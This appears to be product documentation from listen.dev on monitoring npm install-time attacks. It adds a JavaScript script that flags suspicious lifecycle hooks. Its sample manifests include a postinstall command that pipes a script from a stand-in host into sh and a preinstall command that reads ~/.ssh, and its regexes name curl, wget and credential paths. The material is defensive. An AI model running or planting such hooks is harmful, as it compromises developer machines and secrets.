Threat coverage during the installation process.
Currently, listen.dev provides coverage against a range of attack vectors that trigger during the installation phase.
Essentially, this is the stage where your project is built by running the `npm install` command inside your local environment or CI system. At this point, the `package.json` file is used as a manifest for building your project. This manifest typically contains the dependencies to be installed (and downloaded), as well as a collection of `scripts` to be executed as part of the process.
During this phase, we watch for common attack vectors and known indicators of harmful behavior including:
- Spawning of suspicious child processes
- Sensitive data/credential exfiltration (e.g. malicious code exfiltrating environment variables or secrets)
- Suspicious network connections (e.g. pulling a malicious payload from an unauthorized source)
- Suspicious filesystem access (e.g. tampering with or reading the contents of sensitive directories such as .ssh)
Our starting coverage is on threats that trigger during the installation/build phase, which is the stage where third-party open source code gets bundled with internal application code.
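
The install-time surface described above can also be inventoried statically, before any script runs. The following is an added example, not listen.dev's code or detection logic: it lists the `preinstall`, `install` and `postinstall` scripts declared by dependency manifests and tags each with regex heuristics loosely matching the four indicator categories above. The function name, patterns and sample manifests are assumptions constructed for illustration.

```javascript
// Added example: static triage of install-time lifecycle scripts.
// Not listen.dev's implementation; the patterns are illustrative heuristics only.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// One heuristic pattern per indicator category from the list above.
const INDICATORS = [
  { category: "child-process", re: /\|\s*(sh|bash)\b|\bchild_process\b|\b(sh|bash|powershell)\s+-/i },
  { category: "env-access", re: /process\.env|\bprintenv\b/ },
  { category: "network", re: /\b(curl|wget)\b|https?:\/\//i },
  { category: "sensitive-fs", re: /\.(ssh|aws|npmrc)\b/ },
];

// Returns one finding per declared install hook; `categories` is empty
// when no heuristic matched (the hook still deserves a manual look).
function auditManifests(manifests) {
  const findings = [];
  for (const m of manifests) {
    const scripts = m.scripts || {};
    for (const hook of INSTALL_HOOKS) {
      const cmd = scripts[hook];
      if (typeof cmd !== "string") continue;
      const categories = INDICATORS.filter((i) => i.re.test(cmd)).map((i) => i.category);
      findings.push({ package: m.name, hook, command: cmd, categories });
    }
  }
  return findings;
}

// Constructed sample manifests (not real packages).
const SAMPLE_MANIFESTS = [
  { name: "example-clean", scripts: { test: "jest" } },
  { name: "example-native", scripts: { install: "node-gyp rebuild" } },
  { name: "example-fetcher", scripts: { postinstall: "curl -s https://example.invalid/setup.sh | sh" } },
  { name: "example-reader", scripts: { preinstall: `node -e "require('fs').readdirSync(process.env.HOME + '/.ssh')"` } },
];

for (const f of auditManifests(SAMPLE_MANIFESTS)) {
  console.log(`${f.package} [${f.hook}] ${f.categories.join(",") || "no-match"}: ${f.command}`);
}
```

In practice the input would be the parsed `package.json` of each directory under `node_modules`, collected after `npm install --ignore-scripts` so that no hook executes before review. Static matching misses anything the script loads indirectly, which is the gap runtime monitoring of the install phase covers.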